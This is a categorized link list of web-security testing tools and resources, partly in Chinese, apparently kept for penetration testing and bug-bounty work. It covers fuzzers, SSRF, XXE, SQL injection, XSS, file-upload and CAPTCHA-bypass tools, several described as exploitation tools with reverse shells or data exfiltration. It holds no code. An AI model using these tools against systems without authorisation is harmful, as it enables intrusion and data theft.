3rd-party lists
- arainho/awesome-api-security - A collection of awesome API Security tools and resources
- irsdl/top10webseclist - Top Ten Web Hacking Techniques List
- GrrrDog/weird_proxies - Reverse proxies cheatsheet
- Application Security Knowledgebase
Uncategorized
- ffuf/ffuf - Fast web fuzzer written in Go
- lobuhi/byp4xx - Simple bash script to bypass "403 Forbidden" messages with well-known methods discussed in #bugbountytips
- rtcatc/Packer-Fuzzer - 一款针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具 - 2.7K star
- 阿里巴巴集团web安全标准Ver1.4 2015年发布
Pollution
- dwisiswant0/ppfuzz - A fast tool to scan prototype pollution vulnerability written in Rust
- aszx87410/cdnjs-prototype-pollution - Find all libraries on cdn.js that pollute your prototype
Input fuzzing
- musana/fuzzuli - fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain
- Sh1Yo/x8 - Hidden parameters discovery suite
- minimaxir/big-list-of-naughty-strings - a list of strings which have a high probability of causing issues when used as user-input data
- TheKingOfDuck/paramFuzzer - 一款高效的参数fuzz工具|A faster param fuzzing test tool
- Reset password 接口fuzz技巧
Inspector API
JWT
HTTP Smuggling
- defparam/smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
- BishopFox/h2csmuggler - HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
ASP.NET
- 0xacb/viewgen - a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- Illuminopi/RCEvil.NET - a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target
CRLF
SAML
PHP
- hollodotme/fast-cgi-client - A PHP fast CGI client for sending requests (a)synchronously to PHP-FPM
- adoy/PHP-FastCGI-Client - This PHP class handles the communication with a FastCGI (FCGI) application using the FastCGI protocol - 2016停更
- gist: Fastcgi PHP-FPM Client && Code Execution
Unserialize
SSTI
- GoSecure/template-injection-workshop - This repository includes all the test applications presented at Hackfest 2020
- epinna/tplmap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool
- Nodejs
XXE
- XXE Payloads
- BuffaloWill/oxml_xxe - A tool for embedding XXE/XML exploits into different filetypes
- TheTwitchy/xxer - A blind XXE injection callback handler. Uses HTTP and FTP to extract information
- enjoiz/XXEinjector - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods
- GDSSecurity/xxe-recursive-download - exploits XXE to retrieve files from a target server. It obtains directory listings and recursively downloads file contents
- GoSecure/dtd-finder - List DTDs and generate XXE payloads using those local DTDs
- GoSecure/xxe-workshop - Workshop given at Hack in Paris 2019
File upload
- almandin/fuxploider - File upload vulnerability scanner and exploitation tool
- 3xp10it/xupload - A tool for automatically testing whether the upload function can upload webshell
- c0ny1/upload-fuzz-dic-builder - 上传漏洞fuzz字典生成脚本
- GD
SSRF
- blog.assetnote.io: A Glossary of Blind SSRF Chains - 一些SSRF盲打的点
- requestbin: A modern request bin to inspect any event - 可以用来测试SSRF
- swisskyrepo/SSRFmap - Automatic SSRF fuzzer and exploitation tool
- tarunkant/Gopherus - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers - 1K star,支持db/fastcgi/zabbix/smtp等一系列类型
- bcoles/ssrf_proxy - facilitates tunneling HTTP communications through servers vulnerable to Server-Side Request Forgery
- iamultra/ssrfsocks - Creates a SOCK proxy server that transmits data over an SSRF vulnerability
- D4Vinci/Cuteit - Make a malicious ip a bit cuter
- random-robbie/ssrf-finder - Pass list of urls with FUZZ in and it will check if it has found a potential SSRF
- cujanovic/SSRF-Testing - SSRF (Server Side Request Forgery) testing resources
- jmdx/TLS-poison - A tool that allows for generic SSRF via TLS, as well as CSRF via image tags in most browsers
- assetnote/blind-ssrf-chains - An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerability
SQLi
- FSecureLABS/N1QLMap - The tool exfiltrates data from Couchbase database by exploiting N1QL injection vulnerabilities
- stamparm/DSSS - Damn Small SQLi Scanner
- WhitewidowScanner/whitewidow - SQL Vulnerability Scanner
- Coalfire-Research/sqlinator - Automatically forward HTTP GET & POST requests to SQLMap's API to test for SQLi
- 0x3curity/TheDoc - a simple but very useful SQLMAP automator with built in admin finder, hash cracker(using hashca) and more!
- jesuiscamille/AutoSQLi - An automatic SQL Injection tool which takes advantage of
DorkNetGoogler, Ddgr, WhatWaf and sqlmap - ron190/jsql-injection - a Java application for automatic SQL database injection
- Xib3rR4dAr/filter-var-sqli - Bypassing FILTER_SANITIZE_EMAIL & FILTER_VALIDATE_EMAIL filters in filter_var for SQL Injection
- ptsecurity: Advanced MSSQL Injection Tricks
- CaledoniaProject/SQli-Gods-Syntax-V1.0-archive
CMDi
- commixproject/commix - Automated All-in-One OS command injection and exploitation tool
- ewilded/shelling - SHELLING - a comprehensive OS command injection payload generator
Directory Traversal
- ptoomey3/evilarc - Create tar/zip archives that can exploit directory traversal vulnerabilities
- jcesarstef/dotdotslash - An tool to help you search for Directory Traversal Vulnerabilities
- D35m0nd142/LFISuite - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
- lijiejie/idea_exploit - Gather sensitive information from (.idea) folder for pentesters
- nccgroup/dirble - Fast directory scanning and scraping tool
- LandGrey/ClassHound - 利用任意文件下载漏洞自动循环下载并反编译class文件获得网站源码
- mazen160/bfac - BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code
- 7kbstorm/7kbscan-WebPathBrute - 7kbscan-WebPathBrute Web路径暴力探测工具 - 主要是字典
CSP
JSONP
XSS
- doyensec/awesome-electronjs-hacking - A curated list of awesome resources about Electron.js (in)security
- RenwaX23/XSSTRON - Electron JS Browser To Find XSS Vulnerabilities Automatically - 通过创建多个webview来fuzz,挺容易出现RCE
- filedescriptor/untrusted-types - Untrusted Types is a Chrome extension that abuses Trusted Types to log DOMXSS sinks - 已有w3c标准,支持JS污点检测
- hahwul/dalfox - Parameter Analysis and XSS Scanning tool based on golang
- shelld3v/JSshell - A JavaScript reverse shell for exploiting XSS remotely or finding blind XSS, working with both Unix and Windows OS
- heroanswer/XSS_Cheat_Sheet_2020_Edition - xss漏洞模糊测试payload的最佳集合 2020版
- Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing
- twitter: itscachemoney - ways to alert
- Metnew/uxss-db - Universal Cross-site Scripting DB [+ other browser vulnerabilities]
- ismailtasdelen/xss-payload-list - Cross Site Scripting ( XSS ) Vulnerability Payload List
- aurainfosec/xss_payloads - XSS payloads for edge cases
- nettitude/xss_payloads - Exploitation for XSS
- masatokinugawa/filterbypass - Browser's XSS Filter Bypass Cheat Sheet
- xsleaks/xsleaks - cross origin leaks
- ardern.io: Advanced Blind XSS Payloads
- s0md3v/AwesomeXSS - Awesome XSS stuff
- koto/xsschef - Chrome extension Exploitation Framework
- riusksk/FlashScanner - Flash XSS Scanner
- s0md3v/XSStrike - Most advanced XSS detection suite
- ssl/ezXSS - ezXSS is an easy way to test (blind) XSS
- LewisArdern/bXSS - a simple Blind XSS application adapted from https://cure53.de/m
- mandatoryprogrammer/xsshunter - The XSS Hunter service - a portable version of XSSHunter.com
- faizann24/XssPy - Web Application XSS Scanner
- ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework - an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework 结合多种浏览器引擎
- raz-varren/xsshell - An XSS reverse shell framework
- beefproject/beef - The Browser Exploitation Framework Project
- mandatoryprogrammer/sonar.js - A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration combined with WebSockets and external resource fingerprinting
- Firing Range - URL-based DOM XSS vulnerabilities - DOMXSS 案例
- seebug: XSS 扫描器成长记
- Chrome plugins
- doyensec/StandardizedImageProcessingTest - A test suite built with Mocha/Chai to test for behavioral differences between image libraries for the web
Captcha
- sarperavci/GoogleRecaptchaBypass - Solve Google reCAPTCHA in less than 5 seconds
- kerlomz/captcha_trainer - [验证码识别-训练] This project is based on CNN/ResNet/DenseNet+GRU/LSTM+CTC/CrossEntropy to realize verification code identification. This project is only for training the model - pypi的muggle_ocr被删除了
- sml2h3/ddddocr - 带带弟弟 通用验证码识别OCR pypi版
- ecthros/uncaptcha2 - defeating the latest version of ReCaptcha with 91% accuracy - 2019停更
- huaiyukeji/verification_code - 验证码研究破解心得记录。包含网易易盾,阿里云验证码,极验验证码等主流验证码破解。包含点按验证码、点选验证、语序点选等等。已更新极验验证码、企业公示网采集心得。
- https://medium.com/analytics-vidhya/how-to-bypass-recaptcha-v3-with-selenium-python-7e71c1b680fc
Race conditions
Padding Oracle